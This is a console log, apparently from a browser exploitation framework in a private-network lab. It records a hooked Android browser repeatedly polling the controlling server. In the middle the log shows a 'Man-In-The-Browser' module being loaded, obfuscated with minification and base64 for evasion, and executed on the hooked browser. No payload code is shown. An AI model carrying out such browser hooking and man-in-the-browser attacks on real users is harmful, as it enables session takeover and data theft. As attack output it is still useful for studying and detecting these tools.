[23:18:41][>] {"lastseen":"1692573521","count":32,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:42][>] {"lastseen":"1692573522","count":33,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:43][>] {"lastseen":"1692573523","count":34,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:44][>] {"lastseen":"1692573524","count":35,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:45][>] {"lastseen":"1692573525","count":36,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:46][>] {"lastseen":"1692573526","count":37,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:47][>] {"lastseen":"1692573527","count":38,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:48][>] {"lastseen":"1692573528","count":39,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:49][>] {"lastseen":"1692573529","count":40,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:49][>] Server: mounted handler '/command/man_in_the_browser.js'
[23:18:49][>] Hard Load module: 'man_in_the_browser'
[23:18:50][>] {"lastseen":"1692573530","count":41,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:51][>] {"lastseen":"1692573531","count":42,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/*","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] [Evasion] Applying technique: minify
[23:18:56][>] [OBFUSCATION - Minifier] JavaScript has been minified
[23:18:56][>] [Evasion] Applying technique: base_64
[23:18:56][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
[23:18:56][>] [Evasion] Obfuscation completed (498 bytes)
[23:18:56][>] {"lastseen":"1692573536","count":43,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] {"lastseen":"1692573536","count":44,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] {"lastseen":"1692573536","count":45,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] {"lastseen":"1692573536","count":46,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:56][>] {"lastseen":"1692573536","count":47,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:57][>] Event: Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][] Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][>] Event: Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:57][] Hooked browser [id:2, ip:192.168.1.9] has executed instructions (status: UNKNOWN) from command module [cid:1, mod: 43, name:'Man-In-The-Browser']
[23:18:58][>] {"lastseen":"1692573538","count":48,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:59][>] {"lastseen":"1692573539","count":49,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:00][>] {"lastseen":"1692573540","count":50,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:01][>] {"lastseen":"1692573541","count":51,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:02][>] {"lastseen":"1692573542","count":52,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:03][>] {"lastseen":"1692573543","count":53,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:04][>] {"lastseen":"1692573544","count":54,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:05][>] {"lastseen":"1692573545","count":55,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:06][>] {"lastseen":"1692573546","count":56,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:07][>] {"lastseen":"1692573547","count":57,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:08][>] {"lastseen":"1692573548","count":58,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:09][>] {"lastseen":"1692573549","count":59,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:10][>] {"lastseen":"1692573550","count":60,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:12][>] {"lastseen":"1692573551","count":61,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:12][>] {"lastseen":"1692573552","count":62,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:13][>] {"lastseen":"1692573553","count":63,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:14][>] {"lastseen":"1692573554","count":64,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:15][>] {"lastseen":"1692573555","count":65,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:17][>] {"lastseen":"1692573556","count":66,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:19:18][>] {"lastseen":"1692573557","count":67,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
